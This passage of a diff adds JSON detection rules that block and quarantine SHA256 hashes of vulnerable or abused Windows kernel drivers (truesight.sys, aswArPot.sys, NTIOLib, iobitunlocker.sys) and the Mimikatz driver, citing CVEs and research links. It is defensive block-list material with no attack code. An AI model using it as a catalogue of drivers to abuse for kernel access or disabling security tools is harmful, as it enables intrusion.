+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acc554c8-cd52-5981-bae1-8cc535db9036",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456393Z",
+ "creation_date": "2026-03-23T11:45:30.456397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29cf2d374d7afe009bbf60ba5f50db7016314de682cf3a6f90c0996810c821ef",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acc71146-1955-5576-b469-e990f3f26a92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819446Z",
+ "creation_date": "2026-03-23T11:45:31.819448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f580d408a777774f9f5d5079b359e7f1d0acffd35a15bda104f01870d39c0178",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "accb8766-e9e4-5a2c-8149-b48dae1efcb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141363Z",
+ "creation_date": "2026-03-23T11:45:31.141365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3cc4151dad39a2cfdc74620401beee39ba77df791962086aabf711c6d06b607",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acd129e9-99ce-54cc-bab3-fa0adef0827f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827067Z",
+ "creation_date": "2026-03-23T11:45:31.827069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827075Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff7ef87064ea5a88eb8eca036025bb081a00d2ab1c24c0cec8ec2fb0f27f0c95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acd84c09-c1ba-5615-b436-82c5c3ab4e60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490731Z",
+ "creation_date": "2026-03-23T11:45:31.490733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "010a79d3cdb03960969c84bb0316fef86defd97ab61530e34d734b9d1937fd33",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ace12cd4-a45c-5982-889a-b126ba838518",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816617Z",
+ "creation_date": "2026-03-23T11:45:30.816619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5a4a3c3d3d5a79f3ed703fc56d45011c21f9913001fcbcc43a3f7572cff44ec",
+ "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ace92d33-62c8-581d-86c8-80ed8273d96f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456652Z",
+ "creation_date": "2026-03-23T11:45:30.456655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456665Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0dd55b4dc7e561dfe413b029673674e2a5381f5f4daede03ddf3484310a6e11",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acecf9c5-e859-5d29-ac36-f2f1c9d83a6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970703Z",
+ "creation_date": "2026-03-23T11:45:29.970706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "200f98655d1f46d2599c2c8605ebb7e335fee3883a32135ca1a81e09819bc64a",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acf0ae4e-9d8d-5232-8ffe-eaddd033dc17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831585Z",
+ "creation_date": "2026-03-23T11:45:30.831587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "606625f34031d5e1ccbb16b336036e8435d17ad575a4198ad36c4cd86b33630e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acf7be41-3bef-50a2-863f-5e08e2b273ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143308Z",
+ "creation_date": "2026-03-23T11:45:31.143310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff5d3929a5f07a680cd3de28723f6690d813a538c69b28f1253210d0955ed587",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad0251db-787c-5625-82b9-8d3f489fdbc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478960Z",
+ "creation_date": "2026-03-23T11:45:30.478963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6279821bf9ecced596f474c8fc547dab0bddbb3ab972390596bd4c5c7b85c685",
+ "comment": "Vulnerable Kernel Driver (aka rtcoremini64.sys) [https://www.loldrivers.io/drivers/b9e01a11-6395-4837-a202-0c777d717a43/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad027320-32db-5aaf-85ce-62f37fbb1913",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492214Z",
+ "creation_date": "2026-03-23T11:45:31.492216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5c2c18244fcba7fd61f1c711697451457364fbc9e8bb3638327c106776049b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad0d112e-a621-51fd-b230-831f25a8b561",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480205Z",
+ "creation_date": "2026-03-23T11:45:31.480209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8435df2f25910f5ce3ac9a0c6ec1d3c784e2ea2d02cd600b0d61e22d48b8ad9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad17b47a-7788-5453-8342-1a7e94ce21fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146420Z",
+ "creation_date": "2026-03-23T11:45:31.146422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5240c956d8321d423461dac7cfcc73d1ccc3526c251585036eed33daf40d33c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad19b531-06e9-54a1-b2e5-a051e3eadd3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810629Z",
+ "creation_date": "2026-03-23T11:45:31.810631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4912c468ac1757f73ce1dabc7f02d89dd455bd2a9d8da51dd6bae5512967aac3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad223995-021e-5b4a-a785-923f0dc4d652",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615327Z",
+ "creation_date": "2026-03-23T11:45:29.615329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a1d483d6ca994942533fcfe10c11b1725bbb9551e435476453a57ce7ff17029",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad275f03-fe03-503e-80c5-a1e84c1a0c3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976080Z",
+ "creation_date": "2026-03-23T11:45:29.976084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a02b0b4bc2f2cc9034f98d6a35550c56e3e30a09ee16dd61587405a3a92f12ca",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad2937dc-8b07-54eb-8763-9bc4f30d6de7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969630Z",
+ "creation_date": "2026-03-23T11:45:29.969632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb0767d3b74dd3cdd6bb806b647c61afb187cc055ac9730dc8d43a4e6ea095f9",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad489102-a99d-5477-b260-b0b2635bc8d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823833Z",
+ "creation_date": "2026-03-23T11:45:31.823835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823841Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a63aff2747f2d3f20b4c9b2ca1106d901fa0d7c5cd39f9a4e50489c1ccc7c15",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad522b41-052e-5973-a6ec-6a8c3bd097fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830059Z",
+ "creation_date": "2026-03-23T11:45:30.830061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7fe1e99997e1172bac0d62b1519c52784f586497f86147be79ca3eda8a3a9b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad5620c2-c060-5049-ad21-3e13700950a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147587Z",
+ "creation_date": "2026-03-23T11:45:31.147589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f9934c82ece5f1d1f1ad013c969a5bb691006a9a003473a12cae809e280ab58",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad5d44bf-0ff6-5160-9e6d-b3483154073c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816898Z",
+ "creation_date": "2026-03-23T11:45:30.816900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b44dfe8ea675910799fefab7626993926c04bad32091ece3dbdad5add31a6f15",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ad5dc8a5-2939-5264-9160-26080b181598",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
